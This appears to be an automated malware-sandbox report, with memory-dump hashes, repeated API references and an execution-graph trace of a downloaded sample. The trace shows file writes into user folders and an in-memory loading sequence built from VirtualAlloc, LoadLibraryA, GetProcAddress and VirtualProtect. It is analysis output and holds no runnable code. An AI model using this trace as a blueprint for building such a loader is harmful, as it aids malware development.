• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: FreeLocal$CloseHandle
• String ID:
• API String ID: 2045616094-0
• Opcode ID: 628421b90830164cb4c2f28afad2cb0747298d308d1458e63c7488a3f113ad46
• Instruction ID: 2c168e1d38495446e8f8a367176770ab171cc92109c14e0c03fba484d34f9d1b
• Opcode Fuzzy Hash: 628421b90830164cb4c2f28afad2cb0747298d308d1458e63c7488a3f113ad46
• Instruction Fuzzy Hash: 30F0B7B9A10208DFCB25DFF4DD8899EBB7CAF88311F404658B90A97314CA349980CF20
APIs
• LocalFree.KERNEL32(00000000), ref: 003056DD
• LocalFree.KERNEL32(00000000), ref: 003056F2
• CloseHandle.KERNEL32(00000000), ref: 00305702
• CloseHandle.KERNEL32(00000000), ref: 00305712
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 5a9da13ed04661a120f2f202513f8fc72b408daea791d3ea414f668e6f6603bd
• Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
• Opcode Fuzzy Hash: 5a9da13ed04661a120f2f202513f8fc72b408daea791d3ea414f668e6f6603bd
• Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
APIs
• LocalFree.KERNEL32(00000000), ref: 003056DD
• LocalFree.KERNEL32(00000000), ref: 003056F2
• CloseHandle.KERNEL32(00000000), ref: 00305702
• CloseHandle.KERNEL32(00000000), ref: 00305712
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 9c963797796627fbeb9d2c2913dcb7a97871e6763f8215083c46f0b4621c0e78
• Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
• Opcode Fuzzy Hash: 9c963797796627fbeb9d2c2913dcb7a97871e6763f8215083c46f0b4621c0e78
• Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
APIs
• LocalFree.KERNEL32(00000000), ref: 003056DD
• LocalFree.KERNEL32(00000000), ref: 003056F2
• CloseHandle.KERNEL32(00000000), ref: 00305702
• CloseHandle.KERNEL32(00000000), ref: 00305712
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 82885b3f2d2c0c26abc7d4b11b0b3c7dad406af6f34f46c70679e873b0e38f35
• Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
• Opcode Fuzzy Hash: 82885b3f2d2c0c26abc7d4b11b0b3c7dad406af6f34f46c70679e873b0e38f35
• Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: f9b1612e69f87eb3b32eea29af2b905fc80ba58d0fd43d81eb82a54c757eaeae
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: f9b1612e69f87eb3b32eea29af2b905fc80ba58d0fd43d81eb82a54c757eaeae
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 802dbac17767bd83de1d760cde2a07caffcf15c4a2ed60162f51b1aab33f3f2c
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 802dbac17767bd83de1d760cde2a07caffcf15c4a2ed60162f51b1aab33f3f2c
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 0dc373947f521b837ebf4bc373a9813f3182b6fa622ddd006a9d00c22c666e39
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 0dc373947f521b837ebf4bc373a9813f3182b6fa622ddd006a9d00c22c666e39
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 6f155199e27667ea6ce5ce229ebafcc599eb721eebecffb679dca679329860cf
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 6f155199e27667ea6ce5ce229ebafcc599eb721eebecffb679dca679329860cf
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: e52f097e9c6c91e5c57b49be0e2d0222302ba24d8b267b1b55611f9290324b7e
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: e52f097e9c6c91e5c57b49be0e2d0222302ba24d8b267b1b55611f9290324b7e
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 1198e461341a6d004b3772bdb9dfda75934e4557e98349a40252631d07f6e1b5
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 1198e461341a6d004b3772bdb9dfda75934e4557e98349a40252631d07f6e1b5
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 7903b689b989dfe1fd6969a43f921954cf9d137cd31bb84e0df7044e1fcc20c1
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 7903b689b989dfe1fd6969a43f921954cf9d137cd31bb84e0df7044e1fcc20c1
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.5%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:1841
                                                                                                            Total number of Limit Nodes:60
18293 e084ad CoUninitialize 18293->18258 18295->18293 18296 e13040 74 API calls 18295->18296 18297 e08574 18296->18297 18298 e130d0 SysFreeString 18297->18298 18299 e085d3 18298->18299 18299->18293 18300 e086e9 CoCreateGuid 18299->18300 18301 e08741 18300->18301 18302 e08728 StringFromGUID2 18300->18302 18303 e13040 74 API calls 18301->18303 18302->18301 18304 e08756 18303->18304 18305 e130d0 SysFreeString 18304->18305 18306 e087b8 18305->18306 18306->18293 18307 e28378 89 API calls 18306->18307 18308 e087e8 18307->18308 18308->18293 18309 e13040 74 API calls 18308->18309 18310 e08878 18309->18310 18311 e130d0 SysFreeString 18310->18311 18312 e088dd 18311->18312 18312->18293 18494 e13340 SysAllocString 18312->18494 18314 e08b56 18496 e13320 VariantInit 18314->18496 18316 e08bcf 18317 e13340 SysAllocString 18316->18317 18318 e08c50 18317->18318 18319 e13040 74 API calls 18318->18319 18320 e08cd1 18319->18320 18321 e130d0 SysFreeString 18320->18321 18322 e08d7d 18321->18322 18497 e133a0 VariantClear 18322->18497 18324 e08d8b 18498 e133a0 VariantClear 18324->18498 18326 e08d99 18499 e133a0 VariantClear 18326->18499 18328 e08da7 18328->18293 18329 e08db6 CoUninitialize 18328->18329 18329->18258 18332 e0eea8 SHGetKnownFolderPath 18331->18332 18335 e0f1e1 18331->18335 18333 e0f1d6 LocalFree 18332->18333 18334 e0eec7 18332->18334 18333->18335 18336 e28378 89 API calls 18334->18336 18335->18189 18337 e0eeee 18336->18337 18338 e0f510 96 API calls 18337->18338 18339 e0eeff 18338->18339 18340 e0ef10 LocalAlloc 18339->18340 18341 e0f1cb CoTaskMemFree 18339->18341 18342 e0f1c0 LocalFree 18340->18342 18343 e0ef31 18340->18343 18341->18333 18342->18341 18594 e29300 18343->18594 18346 e0f1b5 LocalFree 18346->18342 18347 e0ef87 LocalAlloc 18348 e0efa8 18347->18348 18349 e0f1aa CoTaskMemFree 18347->18349 18350 e28378 89 API calls 18348->18350 18349->18346 18351 e0efcf CreateDirectoryW 18350->18351 18352 e0efed GetLastError 18351->18352 18353 e0effe LocalAlloc 18351->18353 
18352->18353 18354 e0f19f LocalFree 18352->18354 18353->18354 18355 e0f025 18353->18355 18354->18349 18356 e28378 89 API calls 18355->18356 18357 e0f05b CreateFileW 18356->18357 18358 e0f0b0 WriteFile 18357->18358 18359 e0f191 LocalFree 18357->18359 18360 e0f0f5 CloseHandle 18358->18360 18361 e0f178 18358->18361 18359->18354 18605 e1e520 CoInitialize 18360->18605 18361->18359 18363 e0f183 CloseHandle 18361->18363 18363->18359 18365 e0f12c 6 API calls 18365->18335 18367 e1c16d 18366->18367 18643 e1c1f0 GetModuleHandleW 18366->18643 18367->18192 18369 e0f7b9 LocalAlloc 18368->18369 18372 e0f835 18368->18372 18370 e0f7d6 wnsprintfW 18369->18370 18371 e0f82a CoTaskMemFree 18369->18371 18370->18371 18373 e0f806 lstrlenW CoTaskMemFree 18370->18373 18371->18372 18372->18214 18374 e15a80 18372->18374 18373->18372 18375 e0f790 6 API calls 18374->18375 18376 e15aa3 18375->18376 18377 e164a1 18376->18377 18378 e15ab4 LocalAlloc 18376->18378 18377->18219 18377->18220 18379 e15ad5 LocalAlloc 18378->18379 18380 e16496 LocalFree 18378->18380 18381 e15af6 18379->18381 18382 e1648b LocalFree 18379->18382 18380->18377 18383 e15b48 18381->18383 18384 e15afd wnsprintfW wnsprintfW 18381->18384 18382->18380 18386 e15b9a 18383->18386 18387 e15b4f wnsprintfW wnsprintfW 18383->18387 18385 e1645f LocalFree 18384->18385 18385->18377 18388 e15ba1 wnsprintfW wnsprintfW 18386->18388 18389 e15bec 18386->18389 18387->18385 18388->18385 18390 e15bf3 wnsprintfW wnsprintfW 18389->18390 18391 e15c3e 18389->18391 18390->18385 18392 e15c90 18391->18392 18393 e15c45 wnsprintfW wnsprintfW 18391->18393 18394 e15ce2 18392->18394 18395 e15c97 wnsprintfW wnsprintfW 18392->18395 18393->18385 18396 e15d34 18394->18396 18397 e15ce9 wnsprintfW wnsprintfW 18394->18397 18395->18385 18398 e15d86 18396->18398 18399 e15d3b wnsprintfW wnsprintfW 18396->18399 18397->18385 18400 e15dd8 18398->18400 18401 e15d8d wnsprintfW wnsprintfW 18398->18401 18399->18385 18402 e15e2a 18400->18402 18403 e15ddf wnsprintfW wnsprintfW 
18400->18403 18401->18385 18404 e15e31 wnsprintfW wnsprintfW 18402->18404 18405 e15e7c 18402->18405 18403->18385 18404->18385 18406 e15e83 wnsprintfW wnsprintfW 18405->18406 18407 e15ece 18405->18407 18406->18385 18408 e15f20 18407->18408 18409 e15ed5 wnsprintfW wnsprintfW 18407->18409 18410 e15f72 18408->18410 18411 e15f27 wnsprintfW wnsprintfW 18408->18411 18409->18385 18412 e15fc4 18410->18412 18413 e15f79 wnsprintfW wnsprintfW 18410->18413 18411->18385 18414 e16016 18412->18414 18415 e15fcb wnsprintfW wnsprintfW 18412->18415 18413->18385 18416 e16068 18414->18416 18417 e1601d wnsprintfW wnsprintfW 18414->18417 18415->18385 18418 e160ba 18416->18418 18419 e1606f wnsprintfW wnsprintfW 18416->18419 18417->18385 18420 e160c1 wnsprintfW wnsprintfW 18418->18420 18421 e1610c 18418->18421 18419->18385 18420->18385 18422 e16113 wnsprintfW wnsprintfW 18421->18422 18423 e1615e 18421->18423 18422->18385 18424 e161b0 18423->18424 18425 e16165 wnsprintfW wnsprintfW 18423->18425 18426 e16202 18424->18426 18427 e161b7 wnsprintfW wnsprintfW 18424->18427 18425->18385 18428 e16254 18426->18428 18429 e16209 wnsprintfW wnsprintfW 18426->18429 18427->18385 18430 e162a6 18428->18430 18431 e1625b wnsprintfW wnsprintfW 18428->18431 18429->18385 18432 e162f8 18430->18432 18433 e162ad wnsprintfW wnsprintfW 18430->18433 18431->18385 18434 e1634a 18432->18434 18435 e162ff wnsprintfW wnsprintfW 18432->18435 18433->18385 18436 e16351 wnsprintfW wnsprintfW 18434->18436 18437 e1639c 18434->18437 18435->18385 18436->18385 18438 e163a3 wnsprintfW wnsprintfW 18437->18438 18439 e163eb 18437->18439 18438->18385 18440 e163f2 wnsprintfW wnsprintfW 18439->18440 18441 e1643a LocalFree LocalFree LocalFree 18439->18441 18440->18385 18441->18377 18453 e20990 LocalAlloc 18442->18453 18444 e210e5 VirtualFree 18445 e210f8 18444->18445 18445->18236 18446 e20eea LoadLibraryA 18448 e20d79 18446->18448 18452 e20d86 18446->18452 18447 e2108b 18461 e20540 LocalAlloc 18447->18461 18448->18446 18448->18447 18450 
e20fe7 GetProcAddress 18448->18450 18451 e20f8a GetProcAddress 18448->18451 18448->18452 18450->18448 18450->18452 18451->18448 18451->18452 18452->18444 18452->18445 18454 e20a15 18453->18454 18455 e20a1c und_memcpy 18453->18455 18454->18448 18456 e20a5a VirtualAlloc 18455->18456 18457 e20a92 LocalFree 18456->18457 18458 e20aa7 und_memcpy 18456->18458 18457->18454 18459 e20cd5 LocalFree 18458->18459 18460 e20bc3 und_memcpy 18458->18460 18459->18454 18460->18448 18462 e205a8 18461->18462 18465 e205af und_memcpy 18461->18465 18462->18452 18463 e20948 LocalFree 18463->18462 18468 e2088f 18463->18468 18464 e20968 LocalFree 18464->18462 18465->18463 18466 e2085c VirtualProtect 18465->18466 18467 e20899 18466->18467 18466->18468 18467->18463 18468->18462 18468->18464 18470 e17ec8 18469->18470 18471 e17dcd 18469->18471 18476 e17f50 LocalAlloc 18470->18476 18477 e17e03 _snprintf wmemmove 18470->18477 18472 e17dd7 lstrlenW 18471->18472 18473 e17e49 lstrlenW LocalAlloc 18471->18473 18472->18477 18474 e17e97 wmemmove 18473->18474 18475 e17e9e lstrcpyW 18473->18475 18474->18477 18475->18477 18476->18474 18477->18255 18478->18265 18479->18267 18480->18269 18481->18271 18482->18273 18483->18275 18484->18277 18485->18279 18500 e13290 18486->18500 18490 e1307d 18490->18283 18577 e13130 18491->18577 18495 e1337b 18494->18495 18495->18314 18496->18316 18497->18324 18498->18326 18499->18328 18505 e28f00 18500->18505 18503 e13170 SysAllocString 18504 e131b5 18503->18504 18504->18490 18508 e28f0b 18505->18508 18506 e2c678 malloc 62 API calls 18506->18508 18507 e13061 18507->18490 18507->18503 18508->18506 18508->18507 18509 e2c738 _callnewh DecodePointer 18508->18509 18512 e28f2a _DebugMallocator 18508->18512 18509->18508 18510 e28f7b 18522 e29174 18510->18522 18512->18510 18519 e2c660 18512->18519 18516 e28fa2 18528 e2c76c 18516->18528 18537 e2c554 18519->18537 18551 e290e4 18522->18551 18525 e28e6c 18526 e28e9a wmemmove 18525->18526 18527 e28ed9 RaiseException 18526->18527 
18527->18516 18529 e30b64 _lock 62 API calls 18528->18529 18531 e2c77f 18529->18531 18534 e2c4d0 free 62 API calls 18531->18534 18535 e2c7c3 18531->18535 18536 e2c7b3 18531->18536 18533 e2c4d0 free 62 API calls 18533->18535 18534->18536 18576 e30a64 LeaveCriticalSection 18535->18576 18536->18533 18550 e2e4f4 18537->18550 18552 e290f9 18551->18552 18556 e28f8c 18551->18556 18557 e2908c 18552->18557 18556->18525 18558 e290a4 18557->18558 18559 e2909b 18557->18559 18558->18556 18561 e29030 18558->18561 18560 e2c4d0 free 62 API calls 18559->18560 18560->18558 18562 e29035 _cftoe_l 18561->18562 18565 e29076 18561->18565 18563 e2c678 malloc 62 API calls 18562->18563 18564 e2905e 18563->18564 18564->18565 18567 e2c8a0 18564->18567 18565->18556 18568 e2c8ab 18567->18568 18569 e2c8b5 18567->18569 18568->18569 18574 e2c8d1 18568->18574 18570 e2a940 _errno 62 API calls 18569->18570 18571 e2c8bd 18570->18571 18572 e2a8d8 _invalid_parameter_noinfo 17 API calls 18571->18572 18573 e2c8c9 18572->18573 18573->18565 18574->18573 18575 e2a940 _errno 62 API calls 18574->18575 18575->18571 18578 e13144 18577->18578 18579 e08394 18577->18579 18581 e131e0 18578->18581 18579->18280 18579->18286 18582 e13235 18581->18582 18583 e1320a 18581->18583 18582->18579 18583->18582 18585 e13250 18583->18585 18588 e132b0 18585->18588 18587 e13267 18587->18582 18591 e132d0 18588->18591 18590 e132c3 18590->18587 18592 e132f2 18591->18592 18593 e132e4 SysFreeString 18591->18593 18592->18590 18593->18592 18597 e29332 _snprintf 18594->18597 18595 e29337 18596 e2a940 _errno 62 API calls 18595->18596 18599 e2933c 18596->18599 18597->18595 18598 e29356 18597->18598 18610 e2cafc 18598->18610 18601 e2a8d8 _invalid_parameter_noinfo 17 API calls 18599->18601 18603 e0ef64 SHGetKnownFolderPath 18601->18603 18603->18346 18603->18347 18604 e29934 write_char 82 API calls 18604->18603 18606 e0f128 18605->18606 18607 e1e543 CoCreateInstance 18605->18607 18606->18361 18606->18365 18608 e1e60a CoUninitialize 18607->18608 
